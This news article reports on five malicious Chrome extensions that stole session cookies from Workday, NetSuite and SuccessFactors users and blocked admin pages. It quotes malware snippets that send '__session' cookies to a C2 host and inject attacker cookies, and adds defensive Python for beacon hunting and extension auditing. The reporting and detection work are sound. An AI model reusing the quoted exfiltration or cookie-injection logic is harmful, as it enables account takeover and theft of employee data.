In a brazen assault on corporate America’s most sensitive systems, five malicious Chrome extensions masqueraded as productivity boosters for HR and ERP platforms, siphoning authentication tokens and sabotaging security responses. Discovered by supply-chain security firm Socket on January 15, 2026, the extensions targeted juggernauts like Workday, NetSuite, and SAP SuccessFactors, collectively racking up over 2,300 installs before Google yanked them from the Chrome Web Store. “The extensions work in concert to steal authentication tokens, block incident response capabilities, and enable complete account takeover through session hijacking,” Socket security researcher Kush Pandya wrote.
Published under developers databycloud1104 and Software Access, the extensions—DataByCloud Access (ID: oldhjammhkghhahhhdcifmmlefibciph), Tool Access 11 (ID: ijapakghdgckgblfgjobhcfglebbkebf), Data By Cloud 2 (ID: makdmacamkifdldldlelollkkjnoiedg), Data By Cloud 1 (ID: mbjjeombjeklkbndcjgmfcdhfbjngcam), and Software Access (ID: bmodapcihjhklpogdpblefpepjolaoij)—promised streamlined workflows for users juggling multiple enterprise accounts. Data By Cloud 2 alone snagged 1,000 users with its polished dashboard touting ‘premium tools,’ while Tool Access 11 pitched restrictions on ‘special tools’ to avert compromises. Yet their privacy policies falsely vowed no data collection, omitting cookie theft and page blocking entirely, as detailed in BleepingComputer’s January 16 report.
These weren’t opportunistic grabs; the campaign deployed three synchronized tactics. First, relentless cookie exfiltration: every 60 seconds, scripts plucked ‘__session’ cookies from targets like myworkday.com, netsuite.com, and successfactors.com, encrypting and beaming them to C2 servers at api.databycloud.com or api.software-access.com. Code patterns were identical across extensions, per Socket’s teardown.
Exfiltration Engineered for Persistence
The theft mechanism relied on Fetch API calls, as in this snippet from DataByCloud Access: y=e=>chrome.cookies.getAll({domain:e}); n=e=>decodeURIComponent(e?.filter((e=>"__session"===e.name))?.[0]?.value||""); const c=e.base_url?e.base_url:t+"/api/v1/mv3"; await fetch(c+a+(n||""),m). This heartbeat ensured attackers harvested fresh tokens indefinitely, and because a valid session cookie is accepted without re-authentication, it sidestepped MFA entirely. “By setting authentication cookies via the C2, the attackers could take over authenticated sessions without entering usernames, passwords, or multi-factor authentication codes,” Socket explained, enabling seamless pivots into payroll, personnel data, and beyond.
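The fixed 60-second heartbeat to a handful of hosts and a shared URL path is the kind of signal a defender can hunt for in proxy or DNS logs. The following is an added example written for this article, not code from Socket or from the extensions: it parses constructed proxy log lines (the log format, the client addresses and the timestamps are assumptions), matches the C2 hosts and the /api/v1/mv3 path reported above, and flags clients whose requests recur at the reported interval.

```python
import re
from collections import defaultdict
from datetime import datetime

# Indicators named in the article: the two C2 hosts and the API path shared by all five extensions.
C2_HOSTS = {"api.databycloud.com", "api.software-access.com"}
C2_PATH_PREFIX = "/api/v1/mv3"

# Reported heartbeat interval, with a tolerance for jitter and log-timestamp skew (assumed).
BEACON_INTERVAL_S = 60
TOLERANCE_S = 5

# Assumed log format: "<ISO8601 timestamp> <client> <method> <url>" (constructed for this example).
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")
URL_RE = re.compile(r"^https?://([^/?#]+)(/[^?#\s]*)?")

# Constructed sample: 10.0.0.5 beacons every ~60 s, 10.0.0.7 browses Workday normally,
# 10.0.0.9 touches the second C2 host once.
SAMPLE_LOG = [
    "2026-01-15T09:00:00+00:00 10.0.0.5 POST https://api.databycloud.com/api/v1/mv3/abc",
    "2026-01-15T09:00:12+00:00 10.0.0.7 GET https://example.myworkday.com/d/home.htmld",
    "2026-01-15T09:01:01+00:00 10.0.0.5 POST https://api.databycloud.com/api/v1/mv3/abc",
    "2026-01-15T09:01:30+00:00 10.0.0.9 POST https://api.software-access.com/api/v1/mv3",
    "2026-01-15T09:02:00+00:00 10.0.0.5 POST https://api.databycloud.com/api/v1/mv3/abc",
    "2026-01-15T09:02:59+00:00 10.0.0.5 POST https://api.databycloud.com/api/v1/mv3/abc",
]


def parse_line(line):
    """Split one log line into its fields; return None for lines that do not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, client, method, url = m.groups()
    u = URL_RE.match(url)
    if not u:
        return None
    return {
        "ts": datetime.fromisoformat(ts),
        "client": client,
        "method": method,
        "host": u.group(1).lower(),
        "path": u.group(2) or "/",
    }


def is_c2_request(rec):
    """Host match is the strong indicator; the path alone is weaker but still worth surfacing."""
    return rec["host"] in C2_HOSTS or rec["path"].startswith(C2_PATH_PREFIX)


def find_beacons(lines, min_hits=3):
    """Group C2 requests by client and mark clients whose inter-request gaps sit at the heartbeat interval."""
    per_client = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and is_c2_request(rec):
            per_client[rec["client"]].append(rec)

    report = {}
    for client, recs in per_client.items():
        recs.sort(key=lambda r: r["ts"])
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(recs, recs[1:])]
        periodic = len(recs) >= min_hits and all(
            abs(g - BEACON_INTERVAL_S) <= TOLERANCE_S for g in gaps
        )
        report[client] = {
            "hits": len(recs),
            "periodic": periodic,
            "hosts": sorted({r["host"] for r in recs}),
        }
    return report


if __name__ == "__main__":
    for client, info in find_beacons(SAMPLE_LOG).items():
        tag = "BEACON" if info["periodic"] else "contact"
        print(f"{tag:8} {client:10} hits={info['hits']} hosts={','.join(info['hosts'])}")
```

A single contact with a C2 host is already worth a ticket; the periodicity check exists to separate a persistent implant from a one-off lookup (a researcher, a URL scanner) when the same indicator list is run over months of logs.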
Compounding the breach, DOM manipulation crippled remediation. Tool Access 11 blanked 44 Workday admin pages—authentication policies, IP ranges, session controls—via XPath detection and innerHTML wipes, redirecting to bogus home.htmld endpoints. Data By Cloud 2 escalated to 56 pages, neutering password resets, account deactivations, 2FA tweaks, and audit logs, even in Workday’s sandbox at workdaysuv.com. A MutationObserver loop and 30-minute reloads kept blocks ironclad. “Attempts to change passwords, deactivate accounts, adjust security policies, or review sign-on history are silently neutralized,” GBHackers noted on January 19.
The crown jewel: bidirectional hijacking in Software Access. It not only stole but injected attacker-supplied cookies using chrome.cookies.set(), parsing payloads, purging victim cookies, and overwriting sessions. “This installs the victim’s authentication state directly into the threat actor’s browser session,” Socket detailed, quoting the injection logic: await Promise.all(cookies.map(cookie => setCookie(clean(cookie, url)).catch(e => null))).
Defensive Radar Sweeps for Rivals
Paranoia laced the code: all five scanned for 23 rival security extensions—EditThisCookie (fngmhnnpilhplaeedifhccceomclgfbg), Cookie-Editor (hlkenndedednhfkekhgcdicdfddnkalmdm), ModHeader (idgpnmonknjnojddfkpgkljpfnnfcklj), Redux DevTools, SessionBox (mpoceiclggbdkloafnlhlegknfcgomhd), and more—and reported any it found to the C2 via the chrome.management API. Data By Cloud 1 and Software Access layered on anti-debugging with the DisableDevtool library and password field masking, thwarting inspection.
Despite two publishers and emails like admin@databycloud.com, shared infrastructure screamed coordination: identical C2 paths (/api/v1/mv3), security lists, obfuscation, and targets. Permissions mimicked legit integrations—cookies, scripting, declarativeNetRequest—for HR multitaskers. “The extensions target the same enterprise platforms and share identical security tool detection lists, API endpoint patterns, and code structures, indicating a coordinated operation,” Infosecurity Magazine reported January 19, quoting Pandya: “The coordinated deployment of cookie theft, administrative blocking, and session hijacking across five extensions represents a sophisticated attack on enterprise HR and ERP platforms.”
Impact loomed large for Fortune 500s reliant on these platforms for employee data, salaries, compliance. A single foothold could spark ransomware or espionage, with stolen sessions fueling lateral moves. Though installs were modest, enterprise value amplified risks. “The combination of continuous credential theft, administrative interface blocking, and session hijacking creates a scenario where security teams can detect unauthorized access but cannot remediate through normal channels,” The Hacker News warned January 17.
Socket’s Swift Strike and Google’s Response
Socket’s January 15 blog triggered takedowns; by the time BleepingComputer published on January 16, the extensions had vanished from the Web Store, though they lingered on Softonic. No victim firms were named, but Socket urged log hunts for anomalous IPs and sessions. Enterprises also faced a Chrome sync pitfall: a tainted extension installed on one machine propagating across the fleet.
Mitigation mandates were blunt. Users: uninstall by ID, reset credentials from a clean browser, scrub sync. Teams: deploy Chrome Enterprise allowlists, DNS-block the C2 (api.databycloud.com, api.software-access.com, wss://api.software-access.com), audit extensions mimicking HR tools, force MFA re-enrollment. “Implement Chrome Enterprise extension allowlists to prevent installation of unauthorized extensions,” Infosecurity Magazine quoted Pandya. Socket mapped the campaign to MITRE ATT&CK: T1539 (Steal Web Session Cookie), T1185 (Browser Session Hijacking), T1176.001 (Browser Extensions).
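Two of the steps above, auditing installed extensions and enforcing an allowlist, can be scripted. The following is an added example for this article, not code from Socket, Google or the extensions: it checks an extension's ID against the five IDs reported above, flags the permission combination the article says was used to mimic legitimate HR integrations (plus the management permission behind the rival-extension scan), walks a Chrome profile's Extensions folder, and emits the Chrome Enterprise ExtensionInstallBlocklist/ExtensionInstallAllowlist policy pair. The profile layout, the sample manifest and the set of vetted IDs are assumptions.

```python
import json
import os
import tempfile

# The five extension IDs reported by Socket (from the article).
KNOWN_MALICIOUS = {
    "oldhjammhkghhahhhdcifmmlefibciph": "DataByCloud Access",
    "ijapakghdgckgblfgjobhcfglebbkebf": "Tool Access 11",
    "makdmacamkifdldldlelollkkjnoiedg": "Data By Cloud 2",
    "mbjjeombjeklkbndcjgmfcdhfbjngcam": "Data By Cloud 1",
    "bmodapcihjhklpogdpblefpepjolaoij": "Software Access",
}

# Permissions the article associates with the campaign; flagged only when several co-occur,
# since any one of them is common in benign extensions.
SUSPECT_PERMISSIONS = {"cookies", "scripting", "declarativeNetRequest", "management"}
HR_HOSTS = ("myworkday.com", "netsuite.com", "successfactors.com")


def assess_extension(ext_id, manifest):
    """Return a list of findings for one installed extension; an empty list means nothing noted."""
    findings = []
    if ext_id in KNOWN_MALICIOUS:
        findings.append(f"known malicious ID ({KNOWN_MALICIOUS[ext_id]})")

    perms = set(manifest.get("permissions", []))
    hits = perms & SUSPECT_PERMISSIONS
    if len(hits) >= 3:
        findings.append("high-risk permission set: " + ", ".join(sorted(hits)))

    # Host scope from both MV3 host_permissions and content-script match patterns.
    hosts = list(manifest.get("host_permissions", []))
    for cs in manifest.get("content_scripts", []):
        hosts.extend(cs.get("matches", []))
    if "cookies" in perms and any(h in m for m in hosts for h in HR_HOSTS):
        findings.append("cookie access scoped to HR/ERP platform hosts")
    return findings


def scan_profile(profile_dir):
    """Assess every <profile>/Extensions/<id>/<version>/manifest.json (assumed Chrome layout)."""
    results = {}
    ext_root = os.path.join(profile_dir, "Extensions")
    if not os.path.isdir(ext_root):
        return results
    for ext_id in os.listdir(ext_root):
        ext_dir = os.path.join(ext_root, ext_id)
        if not os.path.isdir(ext_dir):
            continue
        for version in os.listdir(ext_dir):
            path = os.path.join(ext_dir, version, "manifest.json")
            if os.path.isfile(path):
                with open(path, encoding="utf-8") as f:
                    results[ext_id] = assess_extension(ext_id, json.load(f))
    return results


def build_chrome_policy(allowed_ids):
    """Block everything by default and allow only vetted IDs; the allowlist overrides the '*' blocklist."""
    return {
        "ExtensionInstallBlocklist": ["*"],
        "ExtensionInstallAllowlist": sorted(set(allowed_ids) - set(KNOWN_MALICIOUS)),
    }


if __name__ == "__main__":
    # Constructed demo profile containing one manifest shaped like the reported extensions.
    with tempfile.TemporaryDirectory() as profile:
        ext_id = "makdmacamkifdldldlelollkkjnoiedg"
        ext_dir = os.path.join(profile, "Extensions", ext_id, "1.0.0_0")
        os.makedirs(ext_dir)
        with open(os.path.join(ext_dir, "manifest.json"), "w", encoding="utf-8") as f:
            json.dump({
                "name": "Data By Cloud 2",
                "permissions": ["cookies", "scripting", "declarativeNetRequest", "management"],
                "host_permissions": ["https://*.myworkday.com/*"],
            }, f)
        for eid, findings in scan_profile(profile).items():
            print(eid, "->", "; ".join(findings) or "no findings")
    print(json.dumps(build_chrome_policy(["vettedextensionid000000000000000"]), indent=2))
```

Point scan_profile at each user's Chrome profile directory on an endpoint to inventory what is actually installed, and ship the policy dict through your Chrome Enterprise management channel; the blocklist-everything-then-allowlist pattern is what stops a sync'd extension from reinstalling itself on a clean machine.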
“Similar patterns targeting other enterprise platforms should be anticipated,” Pandya cautioned, hinting at actor evolution. Disposable domains (404s, SSL flops) underscored opsec. For CISOs, this spotlights browser extensions as unmanaged vectors—permissions unchecked, updates blind. In HR/ERP realms, where one admin session unlocks troves, vigilance now demands allowlisting and behavioral guards.
Broader Ripples in Extension Trust
This salvo follows Socket’s December 2025 Phantom Shuttle bust—VPN fakes proxying 170+ domains—and underscores Chrome Web Store vetting gaps. Enterprises must treat extensions as code, scanning via Socket.dev or peers. Pandya’s team remains on the hunt, dissecting disposable infra for ties. As HR platforms digitize identities, such hijacks threaten not just data, but operational paralysis—security sees intruders, yet hands are tied.


WebProNews is an iEntry Publication